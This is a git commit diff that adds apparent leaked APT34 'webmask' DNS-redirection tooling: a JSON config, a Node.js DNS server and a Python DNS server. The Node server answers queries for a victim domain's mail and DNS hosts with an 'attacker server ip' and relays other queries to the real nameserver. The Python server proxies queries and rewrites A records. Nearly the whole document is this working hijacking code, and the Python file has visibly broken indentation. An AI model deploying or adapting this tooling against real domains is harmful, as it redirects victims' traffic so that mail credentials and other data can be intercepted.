APT34

2019-04-18 11:19:12 +08:00
parent f6c2839353
commit b3c7e3e449
495 changed files with 73786 additions and 0 deletions
--- a/APT34/APT34-LeakCode/webmask/dns-redir/config.json
+++ b/APT34/APT34-LeakCode/webmask/dns-redir/config.json
@@ -0,0 +1,8 @@
+{
+	"overrides":{
+		"victim_domain": "127.0.0.1"
+	},
+	"zones":[
+		"victim_domain"
+	]
+}
--- a/APT34/APT34-LeakCode/webmask/dns-redir/dnsd.js
+++ b/APT34/APT34-LeakCode/webmask/dns-redir/dnsd.js
@@ -0,0 +1,98 @@
+var dns = require('native-dns');
+var fs = require('fs');
+
+
+
+var domainName = ['mail.<victim domain>', 'dns.<victim domain>'];
+var zone = 'hostA.example.org';
+var authorative = '<original nameserver ip>'; //must be ip
+var responseIP = 'attacker server ip';
+var server = dns.createServer();
+
+function replaceAll(target, search, replacement) {
+	return target.replace(new RegExp(search, 'g'), replacement);
+};
+
+server.on('request', function (request, response) {
+	for(var i = 0; i < 1; i++)
+	{
+		var q = request.question[i].name.toLowerCase();
+		
+		console.log('request = ' + q);
+		if(domainName.indexOf(q) > -1 && request.question[i].type == 1)
+		{
+			response.answer.push(dns.A({
+				name: request.question[i].name,
+				address: responseIP,
+				ttl: 600,
+			}));
+			response.send();
+		}
+		else if(q.indexOf(zone) != -1)
+		{
+			//redirect
+			//if(request.question[i].type == 1)
+			{
+				var question2 = dns.Question(request.question[i]);
+				/*question:  dns.Question({
+						name: request.question[i].name,
+						type: 'A'
+					})
+					*/
+				var req = dns.Request({
+					question: question2,
+					server: { address: authorative, port: 53, type: 'udp' },
+					timeout: 1000,
+				});
+				req.on('timeout', function () {
+					console.log('Timeout in making request');
+				});
+
+				req.on('message', function (err, answer) {
+					//console.log(JSON.stringify(answer));
+					for (var j = answer.answer.length - 1; j >= 0; j--) {
+						//console.log(answer.answer[j]);
+						//if(answer.answer[j].type == 1)
+						{
+							response.answer.push(answer.answer[j]);
+							/*
+							response.answer.push(dns.A({
+								name: answer.answer[j].name,
+								address: answer.answer[j].address,
+								ttl: 600,
+							}));
+							*/
+						}
+					}
+				});
+				req.on('end', function () {
+					console.log('Finished processing request');
+					response.send();
+				});
+				console.log('sent ' + request.question[i].name)
+				req.send();
+			}
+			
+		} 
+		
+	}
+	/*
+	response.answer.push(dns.A({
+		name: request.question[0].name,
+		address: '127.0.0.2',
+		ttl: 600,
+	}));
+	response.additional.push(dns.A({
+		name: 'hostA.example.org',
+		address: '127.0.0.3',
+		ttl: 600,
+	}));
+	*/
+	
+});
+
+server.on('error', function (err, buff, req, res) {
+	console.log(err);
+});
+
+server.serve(53);
--- a/APT34/APT34-LeakCode/webmask/dns-redir/dnsd.py
+++ b/APT34/APT34-LeakCode/webmask/dns-redir/dnsd.py
@@ -0,0 +1,80 @@
+import socket
+import SocketServer
+import dnslib
+import sys
+import json
+
+
+config_file = sys.argv[1]
+redir_server = sys.argv[2]
+host = "0.0.0.0"
+port = 53
+
+overrides = {}
+zones = []
+TTL = 60 * 5
+
+
+def parse_config(config_file):
+    f = open(config_file)
+    config = json.loads(f.read())
+    f.close()
+    return config
+
+class MyUDPHandler(SocketServer.BaseRequestHandler):
+    def inZone(self, packet):
+    try:
+        record = dnslib.DNSRecord.parse(packet).q
+        f = open('log.txt', 'a')
+        f.write(str(record) + '\n')
+        f.close()
+        print record
+    except:
+        return False
+        for zone in zones:
+            if str(record.qname).lower().endswith(zone):
+                return True
+        return False
+
+    def override(self, packet):
+        dns_record = dnslib.DNSRecord.parse(packet)
+        if str(dns_record.q.qname).lower() in overrides and dns_record.q.qtype == dnslib.QTYPE.A:
+            dns_record.rr = [dnslib.RR(rname=dns_record.q.qname, rtype=dnslib.QTYPE.A, rclass=1, ttl=TTL, rdata=dnslib.A(overrides[str(dns_record.q.qname).lower()]))]
+            print 'overrride', dns_record.rr[0]
+        '''
+        while True:
+            change = False
+            for i in range(0, len(dns_record.rr)):
+                if str(dns_record.rr[i].rname).lower() in overrides:
+                    if dns_record.rr[i].rtype == dnslib.QTYPE.A and str(dns_record.rr[i].rdata) != overrides[str(dns_record.rr[i].rname).lower()]:
+                        dns_record.rr[i].rdata = dnslib.A(overrides[str(dns_record.rr[i].rname).lower()])
+                        change = True
+                        print dns_record.rr[i]
+                    if dns_record.rr[i].rtype == dnslib.QTYPE.CNAME and str(dns_record.rr[i].rdata).lower() not in overrides:
+                        overrides[str(dns_record.rr[i].rdata).lower()] = overrides[str(dns_record.rr[i].rname).lower()]
+                        change = True
+                        print dns_record.rr[i]
+            if not change:
+                break
+        '''
+        return dns_record.pack()
+
+    def handle(self):
+        print self.client_address
+        data = self.request[0].strip()
+        input_socket = self.request[1]
+        if self.inZone(data):
+            redir_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+            redir_socket.sendto(data, (redir_server, 53))
+            answer = redir_socket.recv(2048)
+            redir_socket.close()
+            answer = self.override(answer)
+            input_socket.sendto(answer, self.client_address)
+        #input_socket.close()
+
+config = parse_config(config_file)
+overrides = config['overrides']
+zones = config['zones']
+server = SocketServer.UDPServer((host, port), MyUDPHandler)
+server.serve_forever()
+